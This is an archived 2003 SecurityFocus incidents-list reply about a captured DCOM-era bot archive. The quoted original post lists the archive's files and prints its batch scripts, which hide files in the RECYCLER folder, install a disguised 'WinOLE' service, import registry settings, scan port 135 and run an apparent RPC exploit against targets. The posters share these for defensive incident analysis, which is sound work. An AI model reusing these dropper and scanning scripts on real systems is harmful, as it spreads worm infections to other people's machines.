RE: DCOM bot.rar
From: Schmehl, Paul L (pauls_at_utdallas.edu)
Date: 08/19/03
- Previous message: Jonathan A. Zdziarski: "SoBig.F (Was: document_all.pif)"
- Maybe in reply to: Andrej: "DCOM bot.rar"
- Next in thread: Steffen Kluge: "Re: DCOM bot.rar"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 19 Aug 2003 16:10:42 -0500 To: <laj@swordlord.com>, <incidents@securityfocus.com>
Typical warez site stuff. Looks like the warez kiddies are using the
worms to create new file repositories. Did you run strings on any of
the files?
Paul Schmehl (pauls@utdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/
> -----Original Message-----
> From: Andrej [mailto:laj@swordlord.com]
> Sent: Tuesday, August 19, 2003 4:22 AM
> To: incidents@securityfocus.com
> Subject: DCOM bot.rar
>
>
> I was finally able to get bot.rar...
> Here is the archive list:
> Archive bot.rar
>
> Name Size Packed Ratio Date Time Attr
> CRC Meth
> Ver
>
> --------------------------------------------------------------
> --------------
> ---
> winole.exe 572928 566724 98% 22-07-03 18:47 .....A
> 6E1BA67C m3e
> 2.9
> wmpx.exe 43383 35139 80% 07-08-03 02:01 .....A
> 0A73E7CB m3e
> 2.9
> wx11.bat 109 109 100% 06-08-03 18:29 .....A
> BA641709 m0e
> 2.9
> wx12.bat 194 166 85% 07-08-03 03:28 .....A
> 66A7E567 m3e
> 2.9
> wx12.exe 19618 10055 51% 06-08-03 20:55 .....A
> 273D03A0 m3e
> 2.9
> logs 0 0 0% 07-08-03 14:22 .D....
> 00000000 m0
> 2.0
> unrar.bat 169 137 81% 06-08-03 18:22 .....A
> 4E276E39 m3e
> 2.9
> UnRAR.exe 194048 87237 44% 16-06-03 18:32 ......
> B638F78C m3e
> 2.9
> bnc.cfg 76 75 98% 27-07-03 16:48 .....A
> 03CDF0A3 m3e
> 2.9
> Clear.exe 28672 11962 41% 16-06-03 18:32 .....A
> FBA086F4 m3e
> 2.9
> click.exe 32768 6149 18% 16-06-03 18:32 .....A
> EA3874C5 m3e
> 2.9
> CRC.EXE 24096 8231 34% 16-06-03 21:41 .....A
> D2158CA5 m3e
> 2.9
> cygwin1.dll 971080 375803 38% 17-06-03 03:06 .....A
> 7337F48A m3e
> 2.9
> deploy.bat 274 185 67% 06-08-03 18:20 .....A
> A3DA5EC6 m3e
> 2.9
> dhcpp.exe 69632 28908 41% 16-06-03 18:32 .....A
> 2CA5E915 m3e
> 2.9
> drvx.dll 2853 1215 42% 06-08-03 21:03 .....A
> 5956B0F0 m3e
> 2.9
> events.exe 134656 37316 27% 22-07-03 17:58 .....A
> 0EF30C5D m3e
> 2.9
> jesus.dll 4254 1275 29% 07-08-03 01:21 .....A
> BFF39F13 m3e
> 2.9
> LucomServer.dll 802 484 60% 06-08-03 18:00
> .....A 4C649F72
> m3e 2.9
> msoft.dll 206 128 62% 24-07-03 00:13 .....A
> 8DF17003 m3e
> 2.9
> nctl.exe 569344 542111 95% 26-07-03 21:12 .....A
> F0C7F7AA m3e
> 2.9
> pslist.exe 49152 21746 44% 16-06-03 21:41 .....A
> ED211211 m3e
> 2.9
> Q019204.EXE 21584 10136 46% 16-06-03 21:41 .....A
> 212BBC50 m3e
> 2.9
> reg.reg 773 432 55% 04-08-03 14:23 .....A
> 6FE50066 m3e
> 2.9
> service.exe 63488 26461 41% 01-07-03 10:40 .....A
> 78DBBEF8 m3e
> 2.9
> service.txt 176 129 73% 06-08-03 18:02 .....A
> E63DBB36 m3e
> 2.9
> SFind.exe 266752 263546 98% 07-08-03 02:04 .....A
> 76BB24D4 m3e
> 2.9
> start.dll 6153 1745 28% 07-08-03 14:22 .....A
> 303AF0E8 m3e
> 2.9
> users.dll 75017 23205 30% 07-08-03 01:22 .....A
> EE2F60B1 m3e
> 2.9
>
> --------------------------------------------------------------
> --------------
> ---
> 29 3152257 2060809 65%
>
>
> the .bat files are below:
> ::::::::::::::
> deploy.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004
> mkdir "logs"
> copy bot.rar
> c:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\LOGS\
> net stop WinOLE
> service.exe -r WinOLE
> service.exe service.txt
> %SYSTEMROOT%\regedit.exe -S reg.reg
> net start WinOLE
> exit
> ::::::::::::::
> unrar.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
>
> attrib -r bot.rar
> attrib -r unrar.exe
> attrib -r unrar.bat
>
> unrar.exe x bot.rar
> start deploy.bat
> EXIT
> ::::::::::::::
> wx11.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> ECHO. > RPC.dll
> sfind -p 135 %1 %2
> del RPC.dll
> ::::::::::::::
> wx12.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> ECHO. > rpcf.dll
> ping -n 1 %2 | find "Reply"
> if errorlevel 1 goto end
> wx12.exe 1 %2 %1
> wx12.exe 0 %2 %1
> :end
> del rpcf.dll
> exit
>
>
> --------------------------------------------------------------
> -------------
> Captus Networks - Integrated Intrusion Prevention and Traffic
> Shaping
> - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
> - Automatically Control P2P, IM and Spam Traffic
> - Ensure Reliable Performance of Mission Critical Applications
> - Precisely Define and Implement Network Security and
> Performance Policies **FREE Vulnerability Assessment Toolkit
> - WhitePapers - Live Demo Visit us at:
> http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
> --------------------------------------------------------------
> --------------
>
>
---------------------------------------------------------------------------
Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
- Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
- Automatically Control P2P, IM and Spam Traffic
- Ensure Reliable Performance of Mission Critical Applications
- Precisely Define and Implement Network Security and Performance Policies
**FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
Visit us at:
http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
----------------------------------------------------------------------------
- Previous message: Jonathan A. Zdziarski: "SoBig.F (Was: document_all.pif)"
- Maybe in reply to: Andrej: "DCOM bot.rar"
- Next in thread: Steffen Kluge: "Re: DCOM bot.rar"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
